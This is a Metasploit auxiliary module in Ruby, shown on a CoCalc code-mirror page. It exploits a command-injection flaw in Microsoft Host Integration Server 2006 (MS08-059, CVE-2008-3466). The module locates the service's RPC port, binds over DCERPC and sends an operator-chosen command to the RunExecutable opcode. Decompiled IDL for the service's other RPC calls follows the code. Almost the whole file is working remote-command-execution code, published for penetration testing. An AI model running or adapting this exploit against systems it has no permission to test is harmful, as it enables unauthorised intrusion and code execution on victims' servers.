CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/ms/ms08_059_his2006.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::DCERPC

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability',

12
      'Description'    => %q{

13
          This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.

14
      },

15
      'DefaultOptions' =>

16
        {

17
          'DCERPC::ReadTimeout' => 300 # Long-running RPC calls

18
        },

19
      'Author'         => [ 'MC' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'MSB', 'MS08-059' ],

24
          [ 'CVE', '2008-3466' ],

25
          [ 'OSVDB', '49068' ],

26
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ],

27
        ],

28
      'DisclosureDate' => '2008-10-14'))

29


30
      register_options(

31
        [

32
        Opt::RPORT(0),

33
        OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),

34
        OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])

35
        ])

36
  end

37


38
  def run

39


40
    dport = datastore['RPORT'].to_i

41


42
    if (dport != 0)

43
      print_status("Could not use automatic target when the remote port is given");

44
      return

45
    end

46


47
    if (dport == 0)

48


49
      dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')

50
      dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')

51


52
      if (not dport)

53
        print_status("Could not determine the RPC port used by the Service.")

54
        return

55
      end

56


57
        print_status("Discovered Host Integration Server RPC service on port #{dport}")

58
    end

59


60
    connect(true, { 'RPORT' => dport })

61


62
    dcerpc_handle('ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])

63
    print_status("Binding to #{handle} ...")

64


65
    dcerpc_bind(handle)

66
    print_status("Bound to #{handle} ...")

67


68
    cmd =  NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")

69


70
    print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")

71


72
      begin

73
        dcerpc_call(0x01, cmd)

74
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse

75
      end

76


77
    disconnect

78


79
  end

80
end

81


82
=begin

83
/*

84
 * IDL code generated by mIDA v1.0.8

85
 * Copyright (C) 2006, Tenable Network Security

86
 * http://cgi.tenablesecurity.com/tenable/mida.php

87
 *

88
 *

89
 * Decompilation information:

90
 * RPC stub type: inline

91
 */

92


93
[

94
 uuid(ed6ee250-e0d1-11cf-925a-00aa00c006c1),

95
 version(1.1)

96
]

97


98
interface mIDA_interface

99
{

100


101
unknown _SnaRpcService_PingServer (

102
);

103


104


105
/* opcode: 0x01, address: 0x01002CBB */

106


107
small   _SnaRpcService_RunExecutable (

108
 [in][string] char arg_1,

109
 [in][string] char arg_2

110
);

111


112
/* opcode: 0x02, address: 0x01002F0B */

113


114
long   _SnaRpcService_CallRemoteDll (

115
 [in] long  arg_1,

116
 [in][size_is(arg_1)] byte arg_2[],

117
 [in] long  arg_3,

118
 [in][size_is(arg_1)] byte arg_4[]

119
);

120


121
unknown _SnaRpcService_GetInstalledDrives (

122
);

123


124
unknown _SnaRpcService_ServiceTableUpdate (

125
);

126


127


128
/* opcode: 0x05, address: 0x0100363C */

129


130
long   _SnaRpcService_GetWindowsVersion (

131
 [in] long  arg_1,

132
 [in, out][size_is(arg_1)] byte arg_2[]

133
);

134


135


136
/* opcode: 0x06, address: 0x01003942 */

137


138
small   _SnaRpcService_RunExecutableEx (

139
 [in][string] char arg_1,

140
 [in][string] char arg_2,

141
 [in][string] char arg_3

142
);

143


144


145
/* opcode: 0x07, address: 0x01003BAB */

146


147
long   _SnaRpcService_GetDLCMediaType (

148
 [in][string] char arg_1,

149
 [out][ref] long * arg_2

150
);

151


152


153
/* opcode: 0x08, address: 0x01003E29 */

154


155
small   _SnaRpcService_UserHasAccess (

156
 [in] long  arg_1

157
);

158


159


160
/* opcode: 0x09, address: 0x01004061 */

161


162
small   _SnaRpcService_ConfigureHisService (

163
 [in][string] char arg_1

164
);

165


166


167
/* opcode: 0x0A, address: 0x01004272 */

168


169
small   _SnaRpcService_ConfigureServiceAccount (

170
 [in][string] char arg_1

171
);

172


173
}

174
=end

175


176